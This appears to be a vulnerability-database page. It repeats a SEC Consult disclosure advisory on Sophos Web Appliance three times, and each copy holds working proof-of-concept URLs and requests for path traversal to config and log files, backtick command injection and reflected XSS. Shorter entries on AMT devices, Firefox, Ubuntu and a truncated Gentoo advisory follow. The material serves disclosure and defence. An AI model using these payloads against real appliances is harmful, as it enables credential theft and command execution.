VARIoT IoT vulnerabilities database

Directory traversal vulnerability in patience.cgi in Sophos Web Appliance before 3.7.8.2 allows remote attackers to read arbitrary files via the id parameter. This may aid in further attacks. Versions prior to Sophos Web Protection Appliance 3.7.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: <= 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- "Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users." URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: ------------------------ SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) Unauthenticated users can read arbitrary files from the filesystem with the privileges of the "spiderman" operating system user. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. 2) OS command injection (CVE-2013-2642) Authenticated users can execute arbitrary commands on the underlying operating system with the privileges of the "spiderman" operating system user. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities the exploit other vulnerabilities in the web interface or conducting phishing attacks. Proof of concept: ----------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication: https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users: https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE"). <host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" 2) OS command injection (CVE-2013-2642) The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user "spiderman": POST /index.php?c=diagnostic_tools HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 92 Cache-Control: no-cache action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60 The "Local Site List" functionality allows injection of arbitrary OS commands: POST /index.php?c=local_site_list_editor HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 205 STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1). If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL: https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) The following URLs demonstrate reflected Cross Site Scripting vulnerabilities: https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E As the application uses URL parameters to transmit session IDs and rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes. Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities. This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker. Possible attack scenario: Use XSS to run malicous Javascript in the browser of a user who has network access to the web interface. This code can: - Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users. - Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system. - Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM). Vendor contact timeline: ------------------------ 2013-02-22: Sending advisory and proof of concept exploit via encrypted channel. 2013-02-23: Vendor acknowledges receipt of advisory. 2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates. 2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule. 2013-03-18: Vendor starts rollout of update to "a first group of customers". 2013-04-03: SEC Consult releases coordinated security advisory. More information can be found at: http://www.sophos.com/en-us/support/knowledgebase/118969.aspx Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com http://blog.sec-consult.com EOF Wolfgang Ettlinger, Stefan Viehb\xf6ck / @2013

Sophos Web Appliance before 3.7.8.2 allows (1) remote attackers to execute arbitrary commands via shell metacharacters in the client-ip parameter to the Block page, when using the user_workstation variable in a customized template, and remote authenticated users to execute arbitrary commands via shell metacharacters in the (2) url parameter to the Diagnostic Tools functionality or (3) entries parameter to the Local Site List functionality. Sophos Web Protection Appliance is prone to multiple command-injection vulnerabilities. Attackers can exploit these issues to disclose sensitive information and execute arbitrary commands with the privileges of the 'spiderman' operating system user. Web Protection Appliance 3.7.8.1 and prior versions are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: <= 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- "Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users." URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: ------------------------ SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities the exploit other vulnerabilities in the web interface or conducting phishing attacks. Proof of concept: ----------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication: https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users: https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE"). <host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" 2) OS command injection (CVE-2013-2642) The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user "spiderman": POST /index.php?c=diagnostic_tools HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 92 Cache-Control: no-cache action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60 The "Local Site List" functionality allows injection of arbitrary OS commands: POST /index.php?c=local_site_list_editor HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 205 STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1). If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL: https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) The following URLs demonstrate reflected Cross Site Scripting vulnerabilities: https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E As the application uses URL parameters to transmit session IDs and rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes. Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities. This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker. Possible attack scenario: Use XSS to run malicous Javascript in the browser of a user who has network access to the web interface. This code can: - Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users. - Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system. - Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM). Vendor contact timeline: ------------------------ 2013-02-22: Sending advisory and proof of concept exploit via encrypted channel. 2013-02-23: Vendor acknowledges receipt of advisory. 2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates. 2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule. 2013-03-18: Vendor starts rollout of update to "a first group of customers". 2013-04-03: SEC Consult releases coordinated security advisory. More information can be found at: http://www.sophos.com/en-us/support/knowledgebase/118969.aspx Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com http://blog.sec-consult.com EOF Wolfgang Ettlinger, Stefan Viehb\xf6ck / @2013

Multiple cross-site scripting (XSS) vulnerabilities in Sophos Web Appliance before 3.7.8.2 allow remote attackers to inject arbitrary web script or HTML via the (1) xss parameter in an allow action to rss.php, (2) msg parameter to end-user/errdoc.php, (3) h parameter to end-user/ftp_redirect.php, or (4) threat parameter to the Blocked component. Sophos Web Appliance Contains a cross-site scripting vulnerability.By any third party, any Web Script or HTML May be inserted. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to Sophos Web Protection Appliance 3.7.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: <= 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- "Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users." URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: ------------------------ SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) Unauthenticated users can read arbitrary files from the filesystem with the privileges of the "spiderman" operating system user. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. 2) OS command injection (CVE-2013-2642) Authenticated users can execute arbitrary commands on the underlying operating system with the privileges of the "spiderman" operating system user. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities the exploit other vulnerabilities in the web interface or conducting phishing attacks. Proof of concept: ----------------- 1) Unauthenticated local file disclosure (CVE-2013-2641) As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication: https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00 Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users: https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00 An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE"). <host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" 2) OS command injection (CVE-2013-2642) The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user "spiderman": POST /index.php?c=diagnostic_tools HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 92 Cache-Control: no-cache action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60 The "Local Site List" functionality allows injection of arbitrary OS commands: POST /index.php?c=local_site_list_editor HTTP/1.1 Host: <host> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 205 STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1). If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL: https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) The following URLs demonstrate reflected Cross Site Scripting vulnerabilities: https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E As the application uses URL parameters to transmit session IDs and rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes. Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities. This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker. Possible attack scenario: Use XSS to run malicous Javascript in the browser of a user who has network access to the web interface. This code can: - Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users. - Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system. - Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM). Vendor contact timeline: ------------------------ 2013-02-22: Sending advisory and proof of concept exploit via encrypted channel. 2013-02-23: Vendor acknowledges receipt of advisory. 2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates. 2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule. 2013-03-18: Vendor starts rollout of update to "a first group of customers". 2013-04-03: SEC Consult releases coordinated security advisory. More information can be found at: http://www.sophos.com/en-us/support/knowledgebase/118969.aspx Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com http://blog.sec-consult.com EOF Wolfgang Ettlinger, Stefan Viehb\xf6ck / @2013

Advanced Media Technologie is a company that provides CATV equipment and broadband products. Multiple Advanced Media Technologie products have a sensitive information disclosure issue that allows an attacker to submit /index.zhtml requests directly to obtain the device's internal IP address information.

Advanced Media Technologie is a company that provides CATV equipment and broadband products. Multiple Advanced Media Technologie products have a denial of service issue that allows unverified attackers to submit /advanced.zhtml requests directly, reboot the device, or reset the device to factory settings.

Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, and SeaMonkey before 2.17 do not ensure the correctness of the address bar during history navigation, which allows remote attackers to conduct cross-site scripting (XSS) attacks or phishing attacks by leveraging control over navigation timing. Mozilla Firefox, SeaMonkey, and Thunderbird are prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Note: This issue was previously discussed in BID 58818 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2013-30 through -40 Multiple Vulnerabilities), but has been moved to its own record to better document it. The issue is fixed in: Firefox 20.0 Firefox ESR 17.0.5 Thunderbird 17.0.5 Thunderbird ESR 17.0.5 SeaMonkey 2.17. ============================================================================ Ubuntu Security Notice USN-1786-2 April 04, 2013 unity-firefox-extension update ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.10 Summary: This update provides a compatible version of Unity Firefox Extension for Firefox 20. Software Description: - unity-firefox-extension: Unity Integration for Firefox Details: USN-1786-1 fixed vulnerabilities in Firefox. (CVE-2013-0788, CVE-2013-0789) Ambroz Bizjak discovered an out-of-bounds array read in the CERT_DecodeCertPackage function of the Network Security Services (NSS) libary when decoding certain certificates. An attacker could potentially exploit this to cause a denial of service via application crash. (CVE-2013-0791) Tobias Schula discovered an information leak in Firefox when the gfx.color_management.enablev4 preference is enabled. If the user were tricked into opening a specially crafted image, an attacker could potentially exploit this to steal confidential data. By default, the gfx.color_management.enablev4 preference is not enabled in Ubuntu. (CVE-2013-0792) Mariusz Mlynski discovered that timed history navigations could be used to load arbitrary websites with the wrong URL displayed in the addressbar. (CVE-2013-0793) It was discovered that the origin indication on tab-modal dialog boxes could be removed, which could allow an attacker's dialog to be displayed over another sites content. An attacker could exploit this to conduct phishing attacks. (CVE-2013-0794) Cody Crews discovered that the cloneNode method could be used to bypass System Only Wrappers (SOW) to clone a protected node and bypass same-origin policy checks. (CVE-2013-0795) A crash in WebGL rendering was discovered in Firefox. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201309-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mozilla Products: Multiple vulnerabilities Date: September 27, 2013 Bugs: #450940, #458390, #460818, #464226, #469868, #474758, #479968, #485258 ID: 201309-23 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Mozilla Firefox, Thunderbird, and SeaMonkey, some of which may allow a remote user to execute arbitrary code. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. Please review the CVE identifiers referenced below for details. Further, a remote attacker could conduct XSS attacks, spoof URLs, bypass address space layout randomization, conduct clickjacking attacks, obtain potentially sensitive information, bypass access restrictions, modify the local filesystem, or conduct other unspecified attacks. Workaround ========== There is no known workaround at this time. Resolution ========== All Mozilla Firefox users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-17.0.9" All users of the Mozilla Firefox binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-17.0.9" All Mozilla Thunderbird users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-17.0.9"= All users of the Mozilla Thunderbird binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-17.0.9" All SeaMonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-2.21" All users of the Mozilla SeaMonkey binary package should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-2.21" References ========== [ 1 ] CVE-2013-0744 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0744 [ 2 ] CVE-2013-0745 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0745 [ 3 ] CVE-2013-0746 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0746 [ 4 ] CVE-2013-0747 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0747 [ 5 ] CVE-2013-0748 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0748 [ 6 ] CVE-2013-0749 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0749 [ 7 ] CVE-2013-0750 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0750 [ 8 ] CVE-2013-0751 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0751 [ 9 ] CVE-2013-0752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0752 [ 10 ] CVE-2013-0753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0753 [ 11 ] CVE-2013-0754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0754 [ 12 ] CVE-2013-0755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0755 [ 13 ] CVE-2013-0756 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0756 [ 14 ] CVE-2013-0757 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0757 [ 15 ] CVE-2013-0758 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0758 [ 16 ] CVE-2013-0759 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0759 [ 17 ] CVE-2013-0760 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0760 [ 18 ] CVE-2013-0761 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0761 [ 19 ] CVE-2013-0762 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0762 [ 20 ] CVE-2013-0763 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0763 [ 21 ] CVE-2013-0764 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0764 [ 22 ] CVE-2013-0765 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0765 [ 23 ] CVE-2013-0766 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0766 [ 24 ] CVE-2013-0767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0767 [ 25 ] CVE-2013-0768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0768 [ 26 ] CVE-2013-0769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0769 [ 27 ] CVE-2013-0770 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0770 [ 28 ] CVE-2013-0771 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0771 [ 29 ] CVE-2013-0772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0772 [ 30 ] CVE-2013-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0773 [ 31 ] CVE-2013-0774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0774 [ 32 ] CVE-2013-0775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0775 [ 33 ] CVE-2013-0776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0776 [ 34 ] CVE-2013-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0777 [ 35 ] CVE-2013-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0778 [ 36 ] CVE-2013-0779 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0779 [ 37 ] CVE-2013-0780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0780 [ 38 ] CVE-2013-0781 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0781 [ 39 ] CVE-2013-0782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0782 [ 40 ] CVE-2013-0783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0783 [ 41 ] CVE-2013-0784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0784 [ 42 ] CVE-2013-0787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0787 [ 43 ] CVE-2013-0788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0788 [ 44 ] CVE-2013-0789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0789 [ 45 ] CVE-2013-0791 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0791 [ 46 ] CVE-2013-0792 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0792 [ 47 ] CVE-2013-0793 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0793 [ 48 ] CVE-2013-0794 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0794 [ 49 ] CVE-2013-0795 